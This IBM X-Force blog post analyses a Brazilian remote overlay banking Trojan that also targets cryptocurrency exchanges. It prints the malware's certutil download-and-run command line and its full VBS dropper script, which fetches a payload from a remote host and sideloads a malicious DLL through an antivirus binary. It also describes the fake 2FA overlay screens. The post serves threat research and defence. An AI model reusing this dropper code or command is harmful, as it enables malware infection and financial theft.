Malware December 10, 2018
By Chen Nahman co-authored by André Piva 6 min read

In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.

In This Article

Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.

Compromising Brazilian Users One Remote Session at a Time

IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.

Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.

The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.

Read the white paper: Preserving trust in digital financial services

Rising Interest in Cryptocurrency

Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.

Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.

A Typical Infection Routine

A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:

  1. The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
  2. The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
  3. The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
  4. The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
  5. The VBS script executes the malware, infecting the device.
  6. Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
  7. After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
  8. The malicious DLL component gives the malware its remote control capabilities.

Zooming In on the Malicious LNK File

A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.

First, the malicious script is downloaded from the remote server under the name “tudodebom”:

“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt
Scroll to view full table
  • -urlcache displays or deletes URL cache entries.
  • -split -f forces fetching of a specific URL and updating of the cache.

Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:

“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs
Scroll to view full table

The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:

hXXps://remoteserver/turbulencianoar/tudodebom.txt
Scroll to view full table

Lastly, the malware executes the malicious VBS script.

Examining the VBS Script

The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:

“C:\AV product_” + RandomName + “\”

After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.

Interesting elements in this routine include:

  • The use of legitimate remote servers to host attack tools;
  • The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
  • The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.

Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:

Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll

Set objShell = CreateObject( “WScript.Shell” )

ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”

randname = getrandomstring()

exerandom = “AV product.SystrayStartTrigger-” + randname

filezip = “AuZwaaU.zip”

deffolder = “C:\AV product_” + randname + “\”

filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”

fileexe = “AuZwaaU.exe”

filedll = “AuZwaaU.sys”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(filesuccess)) Then

WScript.Quit

End If

If not (objFSO.FileExists(filezip)) Then

Set objFile = objFSO.CreateTextFile(filesuccess, True)

objFile.Write ” ”

objFile.Close

‘WScript.Echo msg

dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)

dim bStrm: Set bStrm = createobject(“Adodb.Stream”)

xHttp.Open “GET”, ubase, False

xHttp.Send

with bStrm

.type = 1

.open

.write xHttp.responseBody

.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2

end with

WScript.Sleep 5000

set objShellApp = CreateObject(“Shell.Application”)

set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items

objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”)).CopyHere(FilesInZip)

WScript.Sleep 5000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip

objFSO.CreateFolder deffolder

WScript.Sleep 3000

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”

WScript.Sleep 5000

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

Set objShell = CreateObject( “WScript.Shell” )

outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write “@echo off” & vbCrLf

objFile.Write “@cd ” & deffolder & vbCrLf

objFile.Write “start ” & exerandom & “.exe” & vbCrLf

objFile.Close

objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)

WScript.Sleep 10000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objShell = Nothing

Set objFSO = Nothing

Set objShellApp = Nothing

End If

Function getrandomstring()

Dim intMax, k, intValue, strChar, strName

Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

intMax = 6

Randomize()

strName = “”

For k = 1 To intMax

intValue = Fix(62 * Rnd())

strChar = Mid(Chars, intValue + 1, 1)

Randomize()

intValue = Fix(62 * Rnd())

strChar = strChar & Mid(Chars, intValue + 1, 1)

strName = strName & strChar

If (k < 6) Then

strName = strName & “”

End If

Next

getrandomstring = strName

End Function
Scroll to view full table

Remote Overlay Images

Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.

To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and confirms the user’s security with a fresh one-time password from their tokenization method.

Figure 1: Fake overlay screen asks users to provide information about their identity.

Figure 2: Fake overlay screen asks users to submit a token code.

Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:

Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.

Mitigate Financial Cybercrime Risks

Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.

Read the white paper: Preserving trust in digital financial services

 |  |  |  |  |  |  |  |  |  |  |  |  |  |  | 
Chen Nahman
Security Threat Researcher, IBM Security (Trusteer)

Chen Nahman is a Security Threat Researcher at IBM Security (Trusteer). Chen is experienced in malware analysis and advanced threat research. Prior to that C...

More from Advanced Threats
Advanced Threats   August 2, 2022

Black Hat 2022 Sneak Peek: How to Build a Threat Hunting Program

4 min read - You may recall my previous blog post about how our X-Force veteran threat hunter Neil Wyler (a.k.a “Grifter”) discovered nation-state attackers exfiltrating unencrypted, personally identifiable information (PII) from a company’s network, unbeknownst to the security team. The post highlighted why threat hunting should be a baseline activity in any environment. Before you can embark on a threat hunting exercise, however, it’s important to understand how to build, implement and mature a repeatable, internal threat hunting program. What are the components…

4 min read
Advanced Threats   January 31, 2022

Top-Ranking Banking Trojan Ramnit Out to Steal Payment Card Data

4 min read - Shopping online is an increasingly popular endeavor, and it has accelerated since the COVID-19 pandemic. Online sales during the 2021 holiday season rose nearly 9% to a record $204.5 billion. Mastercard says that shopping jumped 8.5% this year compared to 2020 and 61.4% compared to pre-pandemic levels. Cyber criminals are not missing this trend. The Ramnit Trojan, in particular, is out for a shopping spree that’s designed to take over people’s online accounts and steal their payment card data. IBM…

4 min read
Intelligence & Analytics   October 20, 2021

Detections That Can Help You Identify Ransomware

12 min read - One of the benefits of being part of a global research-driven incident response firm like X-Force Incidence Response (IR) is that the team has the ability to take a step back and analyze incidents, identifying trends and commonalities that span geographies, industries and affiliations. Leveraging that access and knowledge against the ransomware threat has revealed tools, techniques and procedures that can often be detected through the default Windows event logs (WELs). In particular, the X-Force IR team has identified several…

12 min read
Advanced Threats   October 14, 2021

How to Report Scam Calls and Phishing Attacks

5 min read - With incidents such as the Colonial Pipeline infection and the Kaseya supply chain attack making so many headlines these days, it can be easy to forget that malicious actors are still preying on individual users. They're not using ransomware to do that so much anymore, though. Not since the rise of big game hunting, anyway. This term marks ransomware actors' shift away from attacks against individual users and towards operations targeting large enterprises, noted CNBC. But attacks like phishing and…

5 min read
© 2023 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature